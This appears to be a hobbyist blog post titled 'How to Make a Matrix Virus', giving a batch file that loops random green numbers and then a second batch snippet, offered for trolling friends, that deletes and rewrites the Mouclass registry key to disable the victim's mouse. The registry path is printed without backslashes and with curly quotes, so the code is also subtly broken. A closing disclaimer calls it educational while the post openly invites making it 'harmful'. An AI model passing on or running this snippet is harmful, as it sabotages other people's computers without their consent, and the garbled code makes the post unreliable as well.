How to Make a Matrix Virus


Hello everyone, today some fun trick for you people, everbody  want to have fun with some simple bat tricks. You can troll your friend with this one, or you have the opportunitty to make it harmful. Maybe you have heard about making a simple matrix file, it’s like a loop, which uses random numbers in green color, and it will never end. I thought you already know about that or if not you can follow this tutorial to make matrix effects. 

So let's get started to troll your friends;-
This is the code to make your matrix file:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Let me explain the code, since you are looking for this i guess you are familiar with
 @echo off. Next
color 02 this is the color that will be used to display random numbers, in this case color02 is the green one (change it at any color you want).
%random% code will give the bat file random number to display, if you want your fake matrix to look smaller, you can remove some of them.
goto start it will start the code again from beginning, this means , it will be an infinite loop.

Open the Notepad and Just copy this code into your Notepad file, if you want you can edit it, then save it as anything.bat. Also make sure that the Save Type File is set to All Files.


This was the fake part of the virus, it is not harmful, it will just display some numbers and that’s it. But what if you want to make it harmful? you can add some extra code with it, example,

@echo off
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

This is the code that disables computer mouse, you can modify the code and add this one to the code above to make it harmful.

This trick is educational Purpose only i am not responsible for any thing So, don't misuse this trick.

How to Make a Matrix Virus How to Make a Matrix Virus Reviewed by Anonymous on 3:30 AM Rating: 5

1 comment:

  1. how we can run it like i save this code in pluma and then how to use it

    ReplyDelete

Powered by Blogger.